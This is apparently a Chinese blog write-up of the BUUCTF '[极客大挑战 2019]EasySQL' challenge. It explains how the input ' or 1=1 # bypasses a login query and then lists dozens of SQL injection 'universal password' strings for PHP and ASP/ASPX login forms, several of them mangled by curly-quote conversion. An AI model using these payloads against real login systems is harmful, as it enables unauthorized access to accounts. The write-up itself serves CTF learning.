BUUCTF: [极客大挑战 2019]EasySQL 1
BUUCTF: [极客大挑战 2019]EasySQL 1
记录 sql 注入题
账号 'or 1=1 #
密码任意
(这个很好用!)
一般的验证语句为
select * from table_name where username=‘admin’ or 1=1#’ and passwords =‘‘ssss’’
账号中的’使前面的引号闭合,or 1=1 使语句恒成立,最后的#号会注释掉#之后的语句,避免报错,所以sql语句返回真值,成功绕过验证,得到flag
学习内容:
| php | PHP万能密码 |
| 'or 1=1/* | |
| "or “a”="a | |
| "or 1=1– | |
| “or”=" | |
| “or”="a’='a | |
| "or1=1– | |
| “or=or” | |
| '‘or’=‘or’ | |
| ') or (‘a’='a | |
| ‘.).or.(’.a.’=’.a | |
| 'or 1=1 | |
| 'or 1=1– | |
| 'or 1=1/* | |
| ‘or"="a’='a | |
| ‘or’ ‘1’=‘1’ | |
| ‘or’’=’ | |
| ‘or’’=’‘or’’=’ | |
| ‘or’=‘1’ | |
| ‘or’=‘or’ | |
| 'or.‘a.’='a | |
| 'or1=1– | |
| 1’or’1’='1 | |
| a’or’ 1=1– | |
| a’or’1=1– | |
| or ‘a’=‘a’ | |
| or 1=1– | |
| or1=1– |
| asp | aspx万能密码 |
| "or “a”="a | |
| ‘.).or.(’.a.’=’.a | |
| or 1=1– | |
| 'or 1=1– | |
| a’or’ 1=1– | |
| "or 1=1– | |
| 'or.‘a.’='a | |
| “or”="a’='a | |
| ‘or’’=’ | |
| ‘or’=‘or’ | |
| admin’or 1=1# |
本文只为记录学习 如有侵权请联系作者删除
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律